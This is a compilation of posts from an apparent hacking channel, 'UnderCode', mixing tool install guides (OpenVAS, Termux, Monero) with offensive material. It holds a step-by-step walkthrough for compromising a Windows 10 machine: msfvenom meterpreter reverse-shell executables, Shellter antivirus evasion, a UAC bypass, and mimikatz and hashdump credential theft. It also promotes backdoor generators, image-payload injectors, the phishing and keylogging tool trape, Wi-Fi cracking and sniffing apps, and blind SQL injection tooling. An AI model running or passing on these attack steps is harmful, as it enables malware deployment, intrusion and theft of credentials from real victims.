- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑THE FAMOUS SCRIPT FATRAT HAVE NEW RELEASE FOR LINUX OS Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…
(instgram.com/UnderCodeTestingCompany)

🦑Installation & RUN:

> Instructions on how to install TheFatRat

1) git clone https://github.com/Screetsec/TheFatRat.git

2) cd TheFatRat

3) chmod +x setup.sh && ./setup.sh

🦑FEATURES:

> Fully Automating MSFvenom & Metasploit.

> Local or remote listener Generation.

> Easily Make Backdoor by category Operating System.

> Generate payloads in Various formats.

> Bypass anti-virus backdoors.

> File pumper that you can use for increasing the size of your files.

> The ability to detect external IP & Interface address .

> Atomatically creates AutoRun files for USB / CDROM exploitation

@̶͝ ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑HOW SCAN VULNERABLITITY WITH OPEN VAS 9:
(t.me/UnderCodeTestingOfficial)

🦑Installing Openvas 9 on Kali Linux:

> To install Openvas 9 and its dependencies on our Kali Linux system we simply have to run the following command:

1) apt-get update

2) apt-get install openvas

3) Press ‘Y’ to continue the installation of OpenVAS and dependencies.

4) The next step to run the setup procedure that will setup OpenVAS and download a large number of Network Vulnerability Tests (NVTs) or signatures.

5) Due to the large number of NVTs (50.000+) the setup procedure might take a while to complete and consume a considerable amount of data

6) Run the following command to start the setup process:

> openvas-setup

7) When the setup process is finished,

> The web interface is running locally on port 9392 and can accessed through: https://localhost:9392.

8) OpenVAS will also setup an admin account and automatically generate a password for this account which is displayed in the last section of the setup output:

9) you can change password via:

openvasmd –user=[username]–new-password=[password]
openvasmd –user=admin –new-password=[password]

10) After logging in on the web interface we’re redirected to the Greenbone Security Assistant dashboard. From this point on we can start to configure and run vulnerability scans.

11) TO STOP OPEN VAS

> openvas-stop

12) To start the OpenVAS services again, run:

> openvas-start

Written by @̶͝ ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑How to Setup the OpenVAS Virtual Appliance:
(instagram.com/UnderCodeTestingCompany)

🦑INSTALLISATION & RUN:

1) you can also install the OpenVAS virtual appliance in a network and configure it to periodically run scans on the network.

2) The virtual appliance can be downloaded using the following link:

> http://www.openvas.org/vm.html

3) STart VMware or Virtual Box... and configure as following:

>Let’s start with configuring a VM with the following specifications:

-Processor cores: 2

-2 GB RAM

-10 GB Hard disk

-Network: NAT (only when using VMware Workstation/Free/Virtualbox)

-CD/DVD drive: ISO (choose the downloaded iso file as medium)

-Guest operating system: Linux Kernel 4.x or later 64-bit (VMWare) or

-Other Linux (64bit) (VirtualBox)


4) The next step is to boot the virtual machine :

> Its ask to Setup up GSM

> OK

5) Then its ask to format partion

> YES

6) Please note that this process might take a while to complete. When the installation process is finished we have to specify a username for the administrator user.

> We’ll keep it default as admin as well as the password

7) After specifying the username and password we’re asked to reboot the machine,

> choose ‘yes’ to reboot and also to eject the installation medium

8) Next, we’re asked to configure an IP address for the appliance, choose:

> ‘yes’:

9) The next step is to create a web-admin user, choose

> ‘Yes

10) Finally we’re ask about a subscription key, unless you’re in the possession of a subscription key,

> choose ‘skip’ which will provide with the Greenbone community feed

11) Next we’re asked if we want to update the feed, choose

> ‘yes’ to upgrade the feed in the background. After running through all settings we can log out or reboot the appliance and we’re presented with an IP address to access the web interface

12) When we browser to the web interface we’re presented with a login page.

> Use the credentials of the web-admin account we’ve created during the configuration process

Written by @̶͝ ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑 Scanning with OpenVAS 9 part 2:
> Vulnerability Scanning
(Facebook.com/UnderCodeTestingCompanie)

🦑LET S START:

A- Before we can actually start vulnerability scanning with OpenVAS 9, we have to complete the following tasks:

1)Create and configure a target.

2) Create and configure a scan task.

3) Run the scan.

B- The lab setup used for this tutorial looks as follows:

1)Host machine with VMWare Workstation Pro

2)Kali Linux 2018.2 VM with OpenVAS 9.0 installed

3) Metasploitable 2 VM

C- Creating a target in OpenVAS
To create a target, we need to follow 2 steps:

1) Go to ‘Configuration’ in the top menu and select ’Targets’.

2) Click the blue icon in the top left corner to create a new target.

D- After hitting the new target button, a dialog screen appears where we have to enter the following information:

1) Target name, we’ll name it Metasploitable

2) The target IP host which is the IP address for our Metasploitable 2 lab machine.

3) Keep all other settings default and click the ‘Create’ button.

E- Configuring a scanning task in OpenVAS

To create a new scan task, we have to perform the following steps:

1) Go to ‘Scans’ in the top menu and select ’Tasks’.

2) Point to the blue icon in the top left corner and select ‘New Task’.

F- After clicking the new scan option, a dialog screen appears where we have to enter the following information:

1) Task name, we’ll name it ‘Scan Metasploitable 2’.

2) Make sure that the Metasploitable 2 target we’ve created earlier is selected.

3) Tick the schedule once checkbox.

4) Keep all other settings default and click the ‘Create’ button to create the new task.

G- Running the OpenVAS vulnerability scan

The scan task will now execute against the selected target. Please note that full scan may take a while to complete. When you refresh the tasks page you will be able to check the progress for the executed task:

1)Reload the page.

2) Check task status/progress.

H- As expected we can see that OpenVAS found a number of severe vulnerabilities. Let’s have a look at the details of the results.
🦑 Interpreting the scan results

Now that the vulnerability scan is finished we can browse to ‘Scans -> Reports’ in the top menu.

> On the reports page we can find the report for the completed scanning task

I- When we click on the vulnerability name we can get an overview of the details regarding the vulnerability.

ENJOY WITH OUR TUTORIALS

@ UnderCodeOfficial

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑Best apps for WIFI android:
(t.me/UNDERCODETESTINGOFFICIAL)

🦑 Aircrack-ng

> REQUIRE:

1-Rooted Android Device

2-Computer with Ubuntu 14/ 15/ 16 (or any other Linux distribution)

3-USB OTG Adapter (micro USB to USB female cable)

4-Wireless USB Adapter (This is the most important tool)

5-Time (Must, at any cost, don’t give up)

> https://forum.xda-developers.com/showthread.php?t=2338179

🦑Kali Linux Nethunter

> https://www.kali.org/kali-linux-nethunter/

🦑 WiFi WPS WPA Tester

>https://play.google.com/store/apps/details?id=com.tester.wpswpatester

🦑dSploit

Wi-Fi Cracking
Router PWN
Trace
Port Scanner (scan the ports)
Inspector
Vulnerability finder
>Login cracker
Packet forgery (Change the data packets in between)
Man in the middle (Decide the data packets you want to send)
Simple sniff (Steal Victim’s Data from the phone)
Password sniff (ability to view or steal passwords from the victim’s device)
Session Hijacker (Full control over victim’s Device)
Kill connections (Disable usage of data packets, thereby killing the connection)
Redirect to any particular URL to of the attacker’s choice
Replace images (pop up images/replace them with the ones being viewed)
Replace videos (pop up videos/replace them with the ones being played)
Script injector (run random page scripts)
Custom filter
These extra features give this app an advantage over others but some users find it difficult to use and is not updated anymore.

> https://forum.xda-developers.com/showthread.php?t=1914699

🦑 Nmap

>Powerful

>Easy to use

>It is open source so you get all the latest Updates fast free of cost.

>It supports almost all devices.

>Variety of options available.

🦑 Arpspoof

> https://forum.xda-developers.com/showthread.php?t=2236465

🦑Wi-Fi Inspect

>https://play.google.com/store/apps/details?id=lksystems.wifiintruder

🦑Network Spoofer

> https://github.com/w-shackleton/android-netspoof/

🦑 Wi-Fi Kill

>< https://github.com/cSploit/android

🦑 Arcai.com ’s NetCut

> https://play.google.com/store/apps/details?id=com.arcai.netcut

THOSE APPS TESTED BY undercOde

@UnderCodeOfficial

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑TYPES OF BITCOIN ATTACKS Under Code:
(t.me/UnderCodetestingOfficial)

🦑Bitcoin Mitigating Attacks
Bitcoin is the most secure cryptocurrency, which provides security at multiple levels of the protocol. It is often rendering sustained sophisticated attacks. In this section, we are going to look at various types of probable attacks in the bitcoin system.

🦑The Sybil Attack
The Sybil attack happens in the peer-to-peer network. A malicious attacker wishes to carry out this attack on the bitcoin network. In this, a node in the network operates multiple identities at the same time and undermines the authority in the reputation system. Its main aim is to gain the majority of influence in the network to carry out illegal actions in the system.

>The Sybil attack is difficult to detect and prevent, but the following measures can be useful

🦑By increasing the cost of creating a new identity.
Require validation of identities or trust for joining the network.
Give different power to different members.

🦑Race Attack
The Race Attack requires the recipients to accept unconfirmed transactions as payment. As an attacker, you can send the same coin to different vendors by using the two different machines. If the vendors deliver the things without waiting for block confirmation, they will soon realize that the transaction was rejected during the mining process. The solution to this is that the vendor must wait for at least one block confirmation before sending things.

This attack is easier to pull off when the attacker has a direct connection to the victim's node. Therefore it is recommended to turn off incoming connections to nodes for receiving payments so that your node will identify their own peers. And it does not allow the payer to submit the payment to the payee directly.

🦑Finney Attack
The Finney attack is named after Hal Finney. The Finney attack is one of the types of double-spending problem. In this attack, the attacker is the miner who mines blocks normally. In the block, he includes a transaction which sends some of his coins back to himself without broadcasting the transaction. When he finds a pre-mined block, he sends the same coins in a second transaction. The second transaction would be rejected by other miners, but this will take some time. To prevent this attack, the seller should wait for at least six blocks confirmation before releasing the goods.

🦑Vector76 Attack
The Vector76 attack is a combination of the Race attack and the Finney attack such that a transaction that even has one confirmation can still be reversed. In this attack, a miner creates two nodes, one of which is connected to the exchange node, and the other is connected to well-connected peers in the blockchain network. Now, the miner creates two transactions, one high value, and one low value. Then, the attacker pre-mines a high-value transaction to an exchange service. When a block is announced, he quickly sends the pre-mined block directly to the exchange service. When exchange service confirms the high-value transaction, the corrupted attacker sends a low-value transaction to the blockchain network that finally rejects the high-value transaction. As a result, the corrupted attacker's account is deposited on the amount of the high-value transaction. This attack can be protected by disabling the incoming connections and only connecting to well-connected nodes.

🦑The 51% Attack
The 51% attack is a potential attack on the blockchain network. It refers to a single miner or group of miners who are trying to control more than 50% of a network's mining power, computing power or hash rate. In this attack, the attacker can block new transactions from taking place or being confirmed. They are also able to reverse the transactions that have already confirmed while they were in control of the network, leading to a double-spending problem.

> When a miner forms a valid block of transactions, the individual will broadcast the block to other miners on the network. It can only be accepted if all transactions in a block are valid according to the existing record on a blockchain. However, a corrupt minor with more than 50% of a network's hash rate does not broadcast solutions to the rest of the network. It results in the formation of two versions of the blockchain. One is the public version of the blockchain, which is being followed by legitimate miners. And second is use by the corrupt miners who are not broadcasting it to the rest of the network.

Written By Mr. Botnet(tm)

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

—————-𝖀𝖓D𝖊𝖗𝕮𝖔D𝖊—————

🦑TERMUX some commands BY UnderCode
(T.me/UnderCodeTestingOfficial)

🦑INSTALLING Packages:

Let’s install some basic packages. To install packages in termux, the command used is:

> pkg install

🦑Update and upgrade:

>pkg update

>pkg update && pkg upgrade

🦑Installing Python:

>pkg install python

>For Python2

>pkg install python2

>For Python3

>pkg install python3

🦑Installing pip:

>pkg install python-pip

🦑Installing Git:

>pkg install git

🦑Installing wget:

>pkg install wget

🦑Uninstalling Packages:

>pkg uninstall pkg-name

🦑List all install packages:

>pkg list-all

🦑Installing Deb files:

You can similarly manage dpkg too. In case you’ve got a .deb file, you can’t install it using pkg install command. To install such a file, dpkg is used.

🦑Installing:

>dpkg -i ./package.deb

🦑Uninstalling:

>dpkg –remove [package name]

🦑Listing all installed packages:

>dpkg -l

🦑Rest of the commands are almost the same as basic Debian Linux command line.

>Graphical Environment setup:

🦑To enable GUI support in termux, make sure you’ve VNC viewer or Xserver support installed on your device. I’d suggest a VNC viewer. It’s stable and a better choice for GUI. For a better experience use any third party hardware acceleration app as there is no such support available in termux by default.

🦑As I mentioned above, the GUI support uses X11. The X11 packages are available in a separate repository. To enable X11 for GUI support run the following command:

>pkg install x11-repo

WRITTEN BY MR: Botnet(t.m)
——————𝖀𝖓D𝖊𝖗𝕮𝖔D𝖊—————-

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑 THE Cryptonote developers Script tested NEW RELEASE 🦑
Monero: the secure, private, untraceable crypto...
(followme😁 instagram.com/UnderCodeTestingCompany)

🦑INSTALLISATION & RUN:

1) Clone recursively to pull-in needed submodule(s):

> git clone --recursive https://github.com/monero-project/monero

> If you already have a repo cloned, initialize and update:

2) cd monero

3) git submodule init

4) git submodule update

🦑Build instructions

> Monero uses the CMake build system and a top-level Makefile that invokes cmake commands as needed.

> On Linux and macOS

5) Install the dependencies

> Change to the root of the source code directory, change to the most recent release branch, and build:

6) cd monero

7) git checkout release-v0.15

8) make

9) The resulting executables can be found in build/release/bin

> Add PATH="$PATH:$HOME/monero/build/release/bin" to .profile

10) Run Monero with monerod --detach

11) Optional: build and run the test suite to verify the binaries:

12)- make release-test

13) core_tests test may take a few hours to complete.

14) Optional: to build binaries suitable for debugging:

> make debug

15) Optional: to build statically-linked binaries:

> make release-static

🦑TESTED ON:

> Raspberry Pi Zero with a clean install of minimal Raspbian Stretch

> macOS 10.11 amd64 macOS 10.11 amd64

> macOS 10.12

> Windows (MSYS2/MinGW) amd64

> Ubanto

Written By Mr. Botnet(tm)

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑ANONYMOUS RUSSIAN HACKERS WORKS TO DDOS WHATSAPP& FCB SERVICES AGAIN 🦑

AGAIN THEY WANT TO DDOS WHATSAPP SERVICES

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑How to Attack Windows 10 Machine with Metasploit on Kali Linux + Create Undetectable Virus: FULL
(t.me/UnderCodeTestingOfficial) :

🦑LET S START:

1) Creating a Malicious .exe File:

> To create the executable, you would use msfvenom as shown in the command below:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=(IP) LPORT=4444 -o /root/something32.exe

> this will generate generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload.

2) IN SAME COMMAND to get id adress type ifconfig in Terminal

3) Antivirus solutions work by detecting malicious signatures within executables.

4) The payload file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.

🦑Making the Executable FUD (Fully Undetectable)🦑

5) To encode our executable, we shall be using Shellter. Shellter works by changing the executable’s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.

so type in terminal:

> sudo apt-get install shellter

6) Launch as bash then type A ( auto-mode)

7) Put the path of the file (payload created in steps (before)
+ press enter

8) Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.

9) The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L”, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with “1.”

10) Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.

11) run again
> msfconsole
use the generic payload handler “multi/handler” using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload
(in metasploite)

12) Executing the Payload
On copying the file to our target Windows machine

13) Since the file was not run as “administrator,” there are Meterpreter commands that can’t be run as they would result in an “access denied” response. This can be confirmed by running the getuid command, which tells us that we are running as user x ...

14) To prove that the user lacks enough privileges, we attempted to run the command mimikatz_command -f sekurlsa::logonPasswords.

15) Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all administrative rights.

Metasploit by default provides us with some methods that allow us to elevate our privileges. On the Meterpreter prompt we use the
> getsystem command

16) getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module that is used to bypass User Access Control. To do so, we “background” our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background using set SESSION 2.

17) We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.

18) WELL DONE 🦑
With these privileges, we can do quite a lot on our compromised target. For instance, we can obtain LM and NTLM password hashes using the hashdump command as shown above. Note that the format of the hashes above is USERNAME:SID:LM_HASH:NTLM_HASH:::.

Written by ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

Not detected By Major Anti-Virus

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑People tracker on the Internet: OSINT analysis and research tool TESTED BY under Code: NEW release 2019
(instagram.com/UnderCodeTestingCompany)

🦑INSTALLISATION & RUN:

1) git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 -m pip install -r requirements.txt

4) python2 trape.py -h

🦑Example of execution:

> Example: python2 trape.py --url http://example.com --port 8080

🦑Commands run:

PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.

--- SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.

--- INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target's browser.

--- SPEECH: A process of audio creation is maintained which is played in the browser of the target, by means of this you can execute personalized messages in different voices with languages in Spanish and English.

🦑PUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; So you can publish the content of your trape server which is executed locally to the Internet, to manage hooks or public attacks.

> You can get information about the user's network.

--- SPEED: Viewing the target's network speed. (Ping, download, upload, type connection)

--- HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically.

--url In this option you add the URL you want to clone, which works as a decoy.

--port Here you insert the port, where you are going to run the trape server.

--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.

--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.

--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.

--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.

--version You can see the version number of trape.

--update Option used to upgrade to the latest version of trape.

--help It is used to see all the above options, from the executable.

Written by ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑The Best Online Antivirus Scanners
(instagram.com/UnderCodeTestingCompany):

🦑1. Panda Cloud Cleaner

> https://www.pandasecurity.com/uk/homeusers/solutions/cloud-cleaner/

2. ESET Online Scanner

> https://www.eset.com/uk/home/online-scanner/

3. Google Chrome

> Wait, what? Google Chrome has an antivirus scanner? That’s right; you can scan your system files for nasties directly from Google Chrome. It does a decent job, too. As Chrome is the most popular browser around the world, there is a strong chance you already have it installed.

4. F-Secure Online Scanner

> https://www.f-secure.com/en_GB/web/home_gb/online-scanner

5. VIrus Total:

> https://www.virustotal.com/#/home/search

6. Metadefender

> https://metadefender.opswat.com/#!/

@ ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑 .gif and imagePayload Creating/Injecting tools For ANDROID 2019
(instragram.com/UnderCodeTestingCompany)

🦑INSTALLISATION ON OS X:

1-git clone https://github.com/chinarulezzz/pixload

2-sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

3-cd pixload

4-docker build -t pixload .

5-docker run -v "$(pwd):/pixload" -it --rm pixload

6-./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.

7-./bmp.pl -output payload.bmp

[>| BMP Payload Creator/Injector |<]

8-./gif.pl -output payload.gif

[>| GIF Payload Creator/Injector |<
[>] Generating output file
[✔] File saved to: payload.gif
[>] Injecting payload into payload.gif
[✔] Payload was injected successfully

9-/jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg

10-./jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg

11- -place COM:
The payload will be injected as a 'COMMENT'.

Written by ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Lets UnderStand How Payloads Work Full guide:
(instagram.com/UnderCodeTestingCompany)

1> Payload modules are stored in modules/payloads/{singles,stages,stagers}/<platform>.

2> When the framework starts up, stages are combined with stagers to create a complete payload that you can use in exploits. Then, handlers are paired with payloads so the framework will know how to create sessions with a given communications mechanism.

3> Payloads are given reference names that indicate all the pieces, like so:

4> Staged payloads: <platform>/[arch]/<stage>/<stager>
Single payloads: <platform>/[arch]/<single>

5> This results in payloads like windows/x64/meterpreter/reverse_tcp. Breaking that down, the platform is windows, the architecture is x64, the final stage we're delivering is meterpreter, and the stager delivering it is reverse_tcp.

6> Note that architecture is optional because in some cases it is either unnecessary or implied. An example is php/meterpreter/reverse_tcp. Arch is unneeded for PHP payloads because we're delivering interpreted code rather than native.

🦑KINDS:

1> Singles
Single payloads are fire-and-forget. They can create a communications mechanism with Metasploit, but they don't have to. An example of a scenario where you might want a single is when the target has no network access -- a fileformat exploit delivered via USB key is still possible.

2> Stagers
Stagers are a small stub designed to create some form of communication and then pass execution to the next stage. Using a stager solves two problems. First, it allows us to use a small payload initially to load up a larger payload with more functionality. Second, it makes it possible to separate the communications mechanism from the final stage so one payload can be used with multiple transports without duplicating code.

3> Stages
Since the stager will have taken care of dealing with any size restrictions by allocating a big chunk of memory for us to run in, stages can be arbitrarily large. One advantage of that is the ability to write final-stage payloads in a higher-level language like C.

🦑Delivering stages

> The IP address and port you want the payload to connect back to are embedded in the stager. As discussed above, all staged payloads are no more than a small stub that sets up communication and executes the next stage. When you create an executable using a staged payload, you're really just creating the stager.

> So the following commands would create functionally identical exe files:

1) msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp

2) msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp

3) msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp
(Note that these are functionally identical -- there is a lot of randomization that goes into it so no two executables are exactly the same.)

> The Ruby side acts as a client using whichever transport mechanism was set up by the stager (e.g.: tcp, http, https).
In the case of a shell stage, Metasploit will connect the remote process's stdio to your terminal when you interact with it.

> In the case of a Meterpreter stage, Metasploit will begin speaking the Meterpreter wire protocol.

@ ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Top Exploit in WordPress: FULL TUTORIAL
(T.me/UnderCodeTestingOfficial)

🦑WordPress releases regular updates to ensure the platform stays secure. However, there are still cases where security leaks cause harm to many of its users. Most attacks come from WordPress plugins.

> The best way to protect yourself is to stay informed. Here, I’ll be covering some exploitable WordPress plugins that you should be aware of, and offer some advice on how to protect your site.

🦑What is an Exploitable Plugin?
Exploits are security holes present in programs and codes. According to research, WordPress is most vulnerable through unsafe plugins. In this sense, an exploitable plugin is one that comes with a security flaw that hackers can use to harm your WordPress site.

> Further, the CVE details reveal that XSS attacks are the most common hacking type on WordPress.

> Depending on the goal, attackers may breach your system by manipulating bugs or loopholes in the plugin’s code. If they gain access, the first warning signs include strange website behavior like redirecting visitors to malicious websites, or phishing emails to customers from your site — the possibilities are endless.

> That’s why it’s important to spend time and learn more about both WordPress site security, and trusted plugins, which will put you at a lower risk.

🦑Types of WordPress Plugin’s Security Issues
Before moving on, let’s learn about the most common types of WordPress plugin vulnerabilities:

1) Cross-site Scripting
This security issue happens on the client-side. The attackers plant malicious script on websites and execute them in the visitors’ browser.
> Cross-site scripting is also effective for defacement — changing a website’s appearance to show what the attackers want. This is a common tactic of the hacker group Anonymous.

2) SQL Injection
While cross-site scripting targets the client-side, SQL injections aim at the site’s server. As the name suggests, this attack can affect websites that use SQL databases.
>A server stores all valuable information about a website and its users within databases. If an attacker manages to gain access to the databases, the information will be at risk and can be manipulated, stolen, or leaked.

3) File Inclusion Exploits
If your website allows users to upload files like photos or documents, you should be aware of this kind of threat. Hackers can use this to add harmful files to your site to manipulate your server by applying a specific configuration.

> There are two types of file inclusion exploits: Local File Inclusion (LFI) and Remote File Inclusion (RFI). The first needs a local file to be put on the server to execute the script, while the latter relies on a remotely-hosted file to do the work

Written by ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑Top 4 Exploited Plugins in WordPress:
(T.me/UnderCodeTestingOfficial

Now, let’s take a look at the four exploited plugins that had endangered thousands of WordPress users. This list showcases the plugins that contained high-risk exploits:

1) Visual CSS Style Editor
Also known as the Yellow Pencil Visual Theme Customizer, this plugin is used to customize color, font, and the overall theme of a website without using code.

> There was a vulnerability found in the 7.1.9 version of this plugin that endangered as many as 30,000 websites. In the yellow-pencil.php file, there is the yp_remote_get_first() function that checks a certain parameter which triggers privilege escalation.

> Unfortunately, this can let users without proper access to perform top-level actions like changing fundamental options. What is the worst-case scenario? A hacker redirecting the homepage or getting full admin access to your site.

2) WooCommerce Checkout Manager
The WooCommerce Checkout Manager plugin customizes a WooCommerce powered online store’s checkout page. It has more than 50,000 active installations as of writing. This just goes to show that mainstream plugins can also be at risk.

> The plugin had a security flaw that allowed users to delete any media files even unrelated to their checkout process. The deletion of any media in $_POST[‘wccm_default_keys_load’] also removed the metadata from the site’s WordPress library.

3) Ad Inserter
Ad Inserter is used to manage ads and has more than 200,000 active installations. It supports platforms like Google Adsense and Amazon Native Shopping Ads.

> allowed authenticated users with any role – including subscriber – to execute arbitrary PHP code. Not only that, there was another security hole that allowed regular users to utilize the debug mode that should be available to access for administrators only.

4) Social Warfare
With more than 60,000 users, social warfare is one of the most used lightweight WordPress social sharing plugins.


> In March 2019, there was a bug found in version 3.5.2. It came from its clone feature – used to duplicate settings from a site – which was not restricted to the administrator role. The flaw would let hackers overwrite plugin settings on the victim’s site.

> It was found that attackers had modified the twitter_id value that directed to a cross-site scripting injection point.

Written by ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑 How to SEcure ANY WOrdpress Or wix or.. WEBSITE:🦑
(T.me/UnderCodeTestingOfficial)

With so many ways for bad actors to breach your site, how do you stay protected? The following security practices make for a subset of this extensive WordPress security guide:

1) Keep Your WordPress Updated
Using the latest version of WordPress is highly recommended. Not only can you enjoy the newest features but it also guarantees that the latest known security issues are patched.

2) Check Your Plugins Status Regularly
If you’re unsure about the security of the installed plugins, you can check them manually. This allows you to know if one of your plugins is vulnerable to security breaches.

3) Backup Your Site
In case the worst-case scenario occurs, it’s best to have a clean site backup you can restore your site to, decreasing any downtime. Take help from this guide to take a backup effortlessly.

4) Install a Firewall
An end-point firewall is the best way to protect your site from these attacks. Continuous monitoring and blocking of any malicious traffic can secure your site like no other.

> One such firewall is Astra’s hacker-tested firewall. It is known to block 100+ attacks including common attacks like the SQL injection, XSS, CSRF, Bad bots, etc. You can even use this firewall to block or whitelist IP/range/country that are threats for you.

@ ̯̯ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑What is BBQSQL?

Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
(instagram.com/UnderCodeTestingCompany)

> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool,

> allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier

🦑INSTALLISATION & RUN:

1) its require linux os

first clone this repo

> git clone https://github.com/Neohapsis/bbqsql

2) cd bbqsql

3)Or for kali (debian base os)

open terminal and type:

>sudo pip install bbqsql

🦑HOW RUN?

SOME COMMANDS:

${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.

${char_index}: This tells bbqSQL which character from the subselect to query.

${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.

${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.

${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.

